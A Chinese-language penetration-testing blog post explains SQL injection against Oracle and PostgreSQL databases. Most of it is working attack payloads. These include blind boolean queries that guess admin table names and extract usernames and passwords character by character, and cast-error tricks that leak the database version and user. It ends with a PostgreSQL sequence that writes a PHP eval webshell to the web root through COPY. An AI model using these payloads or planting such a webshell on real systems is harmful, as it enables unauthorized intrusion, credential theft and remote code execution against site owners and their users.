最新文章:

首页 渗透测试

详解Oracle注入和pstsgres注入

发布时间:2019年05月23日 评论数:抢沙发 阅读数:306

    1,数据库介
    大型的数据库,甲骨文公司开发,政府,金融,证券等,安全要求高
    特点:支持多用户,大事务,安全和完整性教好,支持多分布式数控管理,移植性强
    2,数据库的代码分析
    程序员对用户输入的特殊字符没有过滤导致的漏洞
    3,注入原理
    两种方法,首先判是否有注入
    第一种,字段长度判断(藏锋者的书<<黑客web脚本攻击与防御技术核心剖析>>
    order by 3
    union select 'null' .null,null from admin挨个尝试加单引号尝试

    第二种,order by 1就不行了,这个时候只能手工爆账户和密码
    首先判断了存在注入,这个时候我们只能判断有什么表
    ?id=99 and (select count(*) from admin)<>0 看是否有admin表,尝试
    ?id=99 and (select count(user) from admin)<>0 看是否有user列,尝
    ?id=99 and (select count(pwd) from admin)<>0 看是否有pwd列,尝试
    ?id=99 and (select count(*) from admin where length(name)>=5)=1 ,尝试5的变化
    ?id=99 and (select count(*) from admin where ascii(substr(name,1,1))>=9)=1,说明第一个字母的ascii大于9,判断第一个字母的ascii值,猜解用户名和密码
    利用和天的试验机我们可以操作一下


    2,postgres数据库的注入

    首先判断注入是否存在
    and 1=1 and 1=2
    获取一些信息(数据库,以及系统内核等)
    and 1=cast(version() as int)
    获取用户以及权限
    and 1=cast(user||123     as  int )
    创建一个表
    :create table xxx(w text not null)
    插入一句话木马
    :insert into  xxx values($$<?php @eval($_POST[lazy]);?>$$);
    执行上面的一句话木马,导出数据
    :copy xxx(w) to $$/home/..lazy.php$$;(爆出的时候出现的路径,lazy.php自己取得名字)
    访问空白,说明写进来了
二维码加载中...
本文作者:h4ck1r      文章标题: 详解Oracle注入和pstsgres注入
本文地址:https://www.hackexp.cn/?post=13
版权声明:若无注明,本文皆为“h4ck1r's Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
正在加载中……
sitemap